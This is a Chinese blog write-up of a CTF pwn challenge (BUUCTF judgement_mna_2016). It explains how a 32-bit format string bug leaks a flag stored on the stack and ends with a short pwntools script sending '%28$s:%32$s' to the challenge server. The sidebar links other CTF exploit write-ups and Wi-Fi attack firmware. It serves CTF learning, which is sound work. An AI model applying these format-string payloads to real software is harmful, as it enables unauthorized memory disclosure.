[BUUCTF]PWN——judgement_mna_2016(32位fmt)

最新推荐文章于 2022-08-21 15:01:39 发布
最新推荐文章于 2022-08-21 15:01:39 发布
阅读量432 收藏
点赞数
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/114966472
版权

judgement_mna_2016

  1. 例行检查,32位程序,开启了canary和nx
    在这里插入图片描述
  2. 运行一下,看看大概的情况
    在这里插入图片描述
  3. 32位ida载入
    在这里插入图片描述
    在这里插入图片描述
  4. 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag
    先找一下输入点参数在栈上的位置
    在这里插入图片描述
    可以看到在oxffffcf4c,然后看一下栈上的布局
    在这里插入图片描述
    发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可

这题根本不用写exp,但为了水长度,贴一下吧

from pwn import *
context.log_level="debug"

p=remote("node3.buuoj.cn",26614)

p.sendline('%28$s:%32$s')
p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
pwn入门-buu第二页解(32道)(持续更新中)(1),2024年最新2024最新网易网络安全面经
2401_84181524的博客
04-10 501
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
judgement_mna_2016
z1r0的博客
02-16 295
judgement_mna_2016 查看保护 这里有一个格式化字符串,flag也被放到栈上去了。 这目很简单,flag在栈上,动调一下看一下flag的偏移然后借助格式化打印出来就行了 28的偏移 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27337)
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1502
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
judgement_mna_201632位fmt
m0_51251108的博客
11-05 150
judgement_mna_201632位 逆向分析: main函数: alloca是一个内存分配函数,与malloc,calloc,realloc类似。 _alloca是在栈(stack)上申请空间,用完马上就释放. 输入函数,getline细看: 控制字符,可打印字符 init函数: load_flag函数: 解: 没思路了,看其他师傅 麻了,原来有个格式化字符串漏洞, 上面大都废话 112/4=32 参考师傅:https://blog.csdn.net/mcmuyanga/art
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本解:https://blog.csdn.net/A951860555/article/details/111030289
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 381
buuctf-pwn 001-016wp
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 278
Pwn 学习 fmt_test_2格式化字符串。
buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号
carol2358的博客
08-14 571
ciscn_2019_final_5 有趣的目 涉及位级操作 漏洞的关键是index为16时,二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了 这很明显是要你改got表 没有show,就把free改成puts来泄漏 exp: from pwn import * from LibcSearcher import ...
Pwntools使用介绍
AlexYoung28的博客
10-18 7863
pwntools是一个用python编写的CTF pwnexploit编写工具,目的是为了帮助 使用者更高效便捷地编写exploit。 目前最新稳定版本为3.12.0(2018年5月 )。文档地址:docs.pwntools.com。 一、环境变量设置 Pwntools的许多设置都是通过全局变量context进行控制的,例如系统、架构、字节序等都可以通过如下的方法更改: >>...
Pwn】2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1013
人好像比较喜欢blind pwn,5道pwn里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 405
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuctf pwn wp(第八波)学会利用ROPgadget
月阴荒的博客
04-22 1583
inndy_rop 简单利用ROPgadget https://www.cnblogs.com/bhxdn/p/12347296.html
BUUCTF-PWN记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1669
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值